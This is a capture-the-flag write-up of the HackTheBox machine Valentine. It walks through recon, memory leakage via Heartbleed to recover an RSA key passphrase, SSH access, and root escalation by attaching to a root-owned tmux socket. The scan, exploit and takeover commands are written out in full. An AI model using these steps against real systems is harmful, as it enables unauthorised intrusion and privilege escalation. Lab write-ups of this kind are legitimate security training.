An easy Linux box from HackTheBox, using heartbleed for initial access, and then taking over a tmux session to get root.

Valentine

Recon

The usual nmap returns not too much, ssh, http, and https

The website itself is just a photo, nothing to click on, no stenography

Doing a gobuster with the following parameters

sudo gobuster dir -u 10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o valentine.dir

Found 3 interesting directories, /dev, /decode and /encode

Inside of /dev find a file called notes.txt

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

So it seems like /decode and /encode are vulnerable in some way

Also inside of /dev find a file called “hype_key” - composed of a bunch of hex, converted to ASCII it becomes an RSA key

Testing out the /encode, the encoder is just base64 - encoding “aaa” to “YWFh”

Also testing out the site can see that the site is running php, since the /encode and /decode also work as /encode.php and /decode.php

Exploitation

Got stuck here forever - the rsa key needed a passphrase, but apparently based on the image

It’s a heartbleed box, however - couldve also ran the “vuln” nmap script

sudo nmap --script vuln -oA vuln-scan 10.10.10.79

To find that ssl is vulnerable to heartbleed

 ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.

Download a heartbleed python exploit from github, and execute it

python2 heartbleed.py 10.10.10.79

Grabs the memory and puts it into an out.txt file, need to convert the hex to ascii

xxd -r out.txt > ascii.txt

And then can see inside of ascii.txt, there is a base64 encoded value

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Which results in a decoded value of

heartbleedbelievethehype

Possibly a password/phrase for the RSA token, lets try it with

openssl rsa -in hype_key_ascii -out rsa.txt

It worked!

Since the rsa key was named “hype_key”, lets try the username “hype” to ssh in

ssh -i rsa.txt hype@10.10.10.79

Now have a low privelege shell, and get user.txt on the desktop

Running linpeas.sh, find that there is a tmux session logged in as root

root       1030  0.0  0.1  26416  1672 ?        Ss   13:17   0:08 /usr/bin/tmux -S /.devs/dev_sess

Checking if we can write to the session

hype@Valentine:/tmp$ ls -la /.devs/dev_sess 
srw-rw---- 1 root hype 0 May 13 13:17 /.devs/dev_sess

We can, lets take over by running the same command we see it running above, -S /.devs/dev_sess

tmux -S /.devs/dev_sess

It opens a tmux session as root!